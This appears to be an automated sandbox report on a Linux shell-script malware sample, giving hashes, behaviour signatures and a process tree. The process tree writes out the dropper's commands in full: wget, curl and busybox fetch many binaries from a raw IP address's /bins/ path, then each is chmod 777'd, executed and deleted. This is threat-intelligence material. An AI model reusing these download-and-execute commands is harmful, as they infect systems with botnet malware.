Analysis
-
max time kernel
24s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 01:43
Static task
static1
Behavioral task
behavioral1
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
-
Size
10KB
-
MD5
0118e79b0c3de04e3eb5808fe1ba68b9
-
SHA1
ac601bcfce442c42f94d103324fba14fcb2f4d81
-
SHA256
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158
-
SHA512
0c23f06947c1ee4f77c2341fdcd5b3daa935c298df783254f52329c9adaf7eb1ac8e72de8b7aa1c960c44dafb766e7dee089998d3dce7c77b9d24679126baddd
-
SSDEEP
192:PoP4oHKWYubHfDdK6fo0M2NNYJSqRbH/1K6fo0UNNYJlo4oHKWM:PoOoxK6fo0M2NNYJSqPK6fo0UNNYJld
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1524 chmod 1644 chmod 1512 chmod 1542 chmod 1560 chmod 1566 chmod 1578 chmod 1632 chmod 1548 chmod 1620 chmod 1499 chmod 1608 chmod 1572 chmod 1584 chmod 1602 chmod 1505 chmod 1554 chmod 1650 chmod 1656 chmod 1518 chmod 1530 chmod 1590 chmod 1596 chmod 1614 chmod 1626 chmod 1638 chmod 1536 chmod 1662 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK 1500 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 1506 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 1513 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK 1519 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha 1525 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP 1531 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 1537 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR 1543 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is 1549 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C 1555 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai 1561 RST5ihgvCHq053iGjxnCyKylug69j9npai /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN 1567 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF 1573 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk 1579 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 1585 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR 1591 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is 1597 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C 1603 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP 1609 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN 1615 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF 1621 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk 1627 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai 1633 RST5ihgvCHq053iGjxnCyKylug69j9npai /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 1639 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 1645 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK 1651 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha 1657 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK 1663 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1508 wget 1510 busybox 1514 rm 1641 wget 1646 rm 1509 curl 1513 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 1642 curl 1643 busybox 1645 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl File opened for modification /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is curl File opened for modification /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR curl File opened for modification /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is curl File opened for modification /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai curl File opened for modification /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha curl File opened for modification /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai curl File opened for modification /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 curl File opened for modification /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF curl File opened for modification /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk curl File opened for modification /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk curl File opened for modification /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP curl File opened for modification /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 curl File opened for modification /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C curl File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl File opened for modification /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK curl File opened for modification /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP curl File opened for modification /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK curl File opened for modification /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR curl File opened for modification /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN curl File opened for modification /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 curl File opened for modification /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C curl File opened for modification /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 curl File opened for modification /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF curl File opened for modification /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK curl File opened for modification /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK curl File opened for modification /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha curl File opened for modification /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN curl
Processes
-
/tmp/c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh/tmp/c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh1⤵PID:1481
-
/bin/rm/bin/rm bins.sh2⤵PID:1482
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1483
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Writes file to tmp directory
PID:1488
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1498
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:1499
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:1500
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1501
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Writes file to tmp directory
PID:1503
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:1504
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:1506
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:1507
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:1508
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1509
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:1510
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1513
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:1514
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:1517
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:1519
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:1520
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:1521
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:1523
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:1526
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:1529
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:1532
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:1533
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:1535
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:1538
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:1541
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:1544
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:1547
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:1550
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:1553
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:1556
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:1559
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:1562
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:1565
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:1568
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:1569
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:1571
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:1573
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:1574
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:1577
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:1580
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:1581
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:1583
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:1586
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:1589
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:1592
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:1595
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:1598
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:1601
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:1604
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:1607
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:1610
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:1613
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:1616
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:1619
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:1622
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:1623
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:1625
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:1628
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Writes file to tmp directory
PID:1630
-
-
